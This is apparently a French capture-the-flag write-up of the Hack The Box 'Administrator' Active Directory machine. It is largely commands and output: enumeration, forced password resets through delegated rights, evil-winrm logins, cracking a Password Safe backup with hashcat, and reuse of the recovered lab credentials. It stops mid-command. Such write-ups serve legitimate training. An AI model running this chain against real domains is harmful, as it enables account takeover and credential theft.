class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Olivia : ichliebedich </span></span><span class="line"><span class="cl">alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl">emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl">emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span><span class="line"><span class="cl">ethan : limpbizkit </span></span><span class="line"><span class="cl">Administrator : 3dc553ce4b9fd20bd016e098d2d2fd2e </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="threader-3000">Threader 3000 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span><span class="lnt">91 </span><span class="lnt">92 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl"> Threader <span class="m">3000</span> - Multi-threaded Port Scanner </span></span><span class="line"><span class="cl"> Version 1.0.7 </span></span><span class="line"><span class="cl"> A project by The Mayor </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Enter your target IP address or URL here: 10.10.11.42 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Scanning target 10.10.11.42 </span></span><span class="line"><span class="cl">Time started: 2024-11-27 14:54:16.528194 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Port <span class="m">21</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">139</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">135</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">88</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">464</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">445</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">389</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">593</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">636</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">3268</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">3269</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">5985</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">9389</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">47001</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49665</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49668</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49664</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49666</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49670</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53246</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53276</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53268</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53251</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53313</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">63231</span> is open </span></span><span class="line"><span class="cl">Port scan completed in 0:00:08.796993 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Threader3000 recommends the following Nmap scan: </span></span><span class="line"><span class="cl">************************************************************ </span></span><span class="line"><span class="cl">nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 </span></span><span class="line"><span class="cl">************************************************************ </span></span><span class="line"><span class="cl">Would you like to run Nmap or quit to terminal? </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl"><span class="nv">1</span> <span class="o">=</span> Run suggested Nmap scan </span></span><span class="line"><span class="cl"><span class="nv">2</span> <span class="o">=</span> Run another Threader3000 scan </span></span><span class="line"><span class="cl"><span class="nv">3</span> <span class="o">=</span> Exit to terminal </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Option Selection: <span class="m">1</span> </span></span><span class="line"><span class="cl">nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 </span></span><span class="line"><span class="cl">Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-11-27 14:55 CET </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.42 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.038s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">21/tcp closed ftp </span></span><span class="line"><span class="cl">53/tcp closed domain </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-11-27 20:55:50Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp closed ldap </span></span><span class="line"><span class="cl">445/tcp closed microsoft-ds </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp closed http-rpc-epmap </span></span><span class="line"><span class="cl">636/tcp closed ldapssl </span></span><span class="line"><span class="cl">3268/tcp closed globalcatLDAP </span></span><span class="line"><span class="cl">3269/tcp closed globalcatLDAPssl </span></span><span class="line"><span class="cl">5985/tcp closed wsman </span></span><span class="line"><span class="cl">9389/tcp closed adws </span></span><span class="line"><span class="cl">47001/tcp closed winrm </span></span><span class="line"><span class="cl">49664/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49665/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49666/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49668/tcp closed unknown </span></span><span class="line"><span class="cl">49670/tcp closed unknown </span></span><span class="line"><span class="cl">53246/tcp closed unknown </span></span><span class="line"><span class="cl">53251/tcp closed unknown </span></span><span class="line"><span class="cl">53268/tcp closed unknown </span></span><span class="line"><span class="cl">53276/tcp closed unknown </span></span><span class="line"><span class="cl">53313/tcp closed unknown </span></span><span class="line"><span class="cl">63231/tcp closed unknown </span></span><span class="line"><span class="cl">Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-security-mode: SMB: Couldn<span class="err">&#39;</span>t find a NetBIOS name that works <span class="k">for</span> the server. Sorry! </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-time: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 65.94 seconds </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Combined scan completed in 0:02:32.888755 </span></span></code></pre></td></tr></table> </div> </div><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap 10.10.11.42 -sV -sC -T4 -Pn </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-11-30 18:52 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> administrator.htb <span class="o">(</span>10.10.11.42<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.072s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">988</span> closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">21/tcp open ftp Microsoft ftpd </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-syst: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ SYST: Windows_NT </span></span><span class="line"><span class="cl">53/tcp open domain Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-12-01 06:52:33Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: administrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: administrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped </span></span><span class="line"><span class="cl">Service Info: Host: DC<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2024-12-01T06:52:40 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: 7h00m02s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 21.37 seconds </span></span></code></pre></td></tr></table> </div> </div><h3 id="rpcclient-enumusers">rpcclient enumusers </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">rpcclient -U Olivia%ichliebedich 10.10.11.42 -c <span class="s2">&#34;enumdomusers&#34;</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>Administrator<span class="o">]</span> rid:<span class="o">[</span>0x1f4<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>Guest<span class="o">]</span> rid:<span class="o">[</span>0x1f5<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>krbtgt<span class="o">]</span> rid:<span class="o">[</span>0x1f6<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>olivia<span class="o">]</span> rid:<span class="o">[</span>0x454<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>michael<span class="o">]</span> rid:<span class="o">[</span>0x455<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>benjamin<span class="o">]</span> rid:<span class="o">[</span>0x456<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>emily<span class="o">]</span> rid:<span class="o">[</span>0x458<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>ethan<span class="o">]</span> rid:<span class="o">[</span>0x459<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>alexander<span class="o">]</span> rid:<span class="o">[</span>0xe11<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>emma<span class="o">]</span> rid:<span class="o">[</span>0xe12<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="smbclient">smbclient </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient -L //10.10.11.42 -U Olivia%ichliebedich </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON Disk Logon server share </span></span><span class="line"><span class="cl"> SYSVOL Disk Logon server share </span></span><span class="line"><span class="cl">Reconnecting with SMB1 <span class="k">for</span> workgroup listing. </span></span><span class="line"><span class="cl">do_connect: Connection to 10.10.11.42 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> </span></span><span class="line"><span class="cl">Unable to connect with SMB1 -- no workgroup available </span></span></code></pre></td></tr></table> </div> </div><h3 id="sharphound">SharpHound </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">upload SharpHound.ps1 . </span></span></code></pre></td></tr></table> </div> </div><h3 id="bloodhound">Bloodhound </h3><p>On importe les données obtenu. Puis on voit que Olivia a des acces generic All sur Michael. On peut alors changer son mot de passe:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Olivia : Droits GenericAll sur l&#39;utilisateur Michael</span> </span></span><span class="line"><span class="cl"> Set-ADAccountPassword -Identity <span class="s2">&#34;Michael&#34;</span> -NewPassword <span class="o">(</span>ConvertTo-SecureString -AsPlainText <span class="s2">&#34;azertyazerty&#34;</span> -Force<span class="o">)</span> -Reset </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Connexion avec le compte de Michael</span> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u Michael -p azertyazerty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Michael : Droits ForceChangePassword</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## D&#39;abord, il faut ajouter PowerView.ps1 pour obtenir certaines commandes dans</span> </span></span><span class="line"><span class="cl"><span class="c1">## le powershell de Evil-Winrm</span> </span></span><span class="line"><span class="cl">upload PowerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## On load powerview dans le powershell</span> </span></span><span class="line"><span class="cl"><span class="c1">## On met un &#34;.&#34; devant pour charger dans l&#39;environnement powershell actuelle et pas dans un sous-environnement</span> </span></span><span class="line"><span class="cl">. .<span class="se">\P</span>owerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Changement du mot de passe de Benjamin</span> </span></span><span class="line"><span class="cl">Set-DomainUserPassword -Identity Benjamin -AccountPassword <span class="o">(</span>ConvertTo-SecureString <span class="s1">&#39;azertyazerty&#39;</span> -AsPlainText -Force<span class="o">)</span> -Verbose </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Connexion avec l&#39;utilisateur Benjamin</span> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u Benjamin -p azertyazerty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## RIEN !</span> </span></span><span class="line"><span class="cl">smbclient </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## FTP</span> </span></span><span class="line"><span class="cl">ftp 10.10.11.42 </span></span><span class="line"><span class="cl">&gt; get Backup.psafe3 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="bruteforce-backuppsafe3">Bruteforce Backup.psafe3 </h3><p>On bruteforce le password maitre du fichier Backup.psafe3 qui est un fichier password safe. Pour cela, on utilise <code>hashcat</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5200</span> -a <span class="m">0</span> Backup.psafe3 ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.5<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">OpenCL API <span class="o">(</span>OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG<span class="o">)</span> - Platform <span class="c1">#1 [The pocl project]</span> </span></span><span class="line"><span class="cl"><span class="o">=====================================================================================================================================</span> </span></span><span class="line"><span class="cl">* Device <span class="c1">#1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 6839/13742 MB (2048 MB allocatable), 8MCU</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Minimum password length supported by kernel: <span class="m">0</span> </span></span><span class="line"><span class="cl">Maximum password length supported by kernel: <span class="m">256</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Hashes: <span class="m">1</span> digests<span class="p">;</span> <span class="m">1</span> unique digests, <span class="m">1</span> unique salts </span></span><span class="line"><span class="cl">Bitmaps: <span class="m">16</span> bits, <span class="m">65536</span> entries, 0x0000ffff mask, <span class="m">262144</span> bytes, 5/13 rotates </span></span><span class="line"><span class="cl">Rules: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Optimizers applied: </span></span><span class="line"><span class="cl">* Zero-Byte </span></span><span class="line"><span class="cl">* Single-Hash </span></span><span class="line"><span class="cl">* Single-Salt </span></span><span class="line"><span class="cl">* Slow-Hash-SIMD-LOOP </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Watchdog: Temperature abort trigger <span class="nb">set</span> to 90c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host memory required <span class="k">for</span> this attack: <span class="m">2</span> MB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: /home/leopold/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139922195</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Backup.psafe3:tekieromucho </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">5200</span> <span class="o">(</span>Password Safe v3<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: Backup.psafe3 </span></span><span class="line"><span class="cl">Time.Started.....: Thu Nov <span class="m">28</span> 15:13:47 <span class="m">2024</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Thu Nov <span class="m">28</span> 15:13:47 <span class="m">2024</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>/home/leopold/wordlists/rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#1.........: <span class="m">27754</span> H/s <span class="o">(</span>5.85ms<span class="o">)</span> @ Accel:64 Loops:1024 Thr:1 Vec:8 </span></span><span class="line"><span class="cl">Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests </span></span><span class="line"><span class="cl">Progress.........: 5120/14344385 <span class="o">(</span>0.04%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/5120 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 4608/14344385 <span class="o">(</span>0.03%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#1....: Liverpool -&gt; babygrl </span></span><span class="line"><span class="cl">Hardware.Mon.#1..: Temp: 60c Util: 22% </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Started: Thu Nov <span class="m">28</span> 15:13:27 <span class="m">2024</span> </span></span><span class="line"><span class="cl">Stopped: Thu Nov <span class="m">28</span> 15:13:48 <span class="m">2024</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passwordsafe">PasswordSafe </h3><p>On installe <code>pwsafe</code> puis on ouvre la base de donnée avec le mot de passe trouvé <strong>tekieromucho</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo apt isntall pwsafe </span></span><span class="line"><span class="cl">pwsafe ./Backup.psafe3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl">emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl">emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">./nxc smb 10.10.11.42 -u <span class="s1">&#39;emily&#39;</span> -p <span class="s1">&#39;UXLCI5iETUsIBoFVTj8yQFKoHjXmb&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.42 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span 